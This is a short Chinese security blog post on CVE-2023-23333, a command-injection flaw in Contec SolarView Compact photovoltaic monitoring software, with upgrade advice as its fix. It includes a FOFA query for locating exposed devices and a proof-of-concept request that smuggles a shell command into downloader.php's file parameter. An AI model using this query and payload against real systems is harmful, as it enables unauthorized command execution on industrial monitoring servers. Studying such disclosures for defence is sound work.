CVE-2023-23333—SolarView Compact RCE 任意命令执行

admin 2023年7月4日09:58:22评论113 views字数 313阅读1分2秒阅读模式

CVE-2023-23333—SolarView Compact RCE 任意命令执行

漏洞简介

Contec SolarView Compact 是日本 Contec 公司的一个应用系统,提供光伏发电测量系统。其6.00版本以前存在命令注入漏洞,攻击者可以通过 downloader.php 绕过内部限制执行命令,通过该漏洞在服务器端任意执行代码,获取服务器权限。
影响版本

SolarView Compact <= 6.00

FOFA语句

body="SolarView Compact" && title="Top"

CVE-2023-23333—SolarView Compact RCE 任意命令执行

漏洞复现

CVE-2023-23333—SolarView Compact RCE 任意命令执行

抓包,替换POC

downloader.php?file=%3Bpwd%00.zip

CVE-2023-23333—SolarView Compact RCE 任意命令执行

修复建议

升级版本至最新

CVE-2023-23333—SolarView Compact RCE 任意命令执行

原文始发于微信公众号(巢安实验室):CVE-2023-23333—SolarView Compact RCE 任意命令执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月4日09:58:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-23333—SolarView Compact RCE 任意命令执行http://cn-sec.com/archives/1852725.html

发表评论

匿名网友 填写信息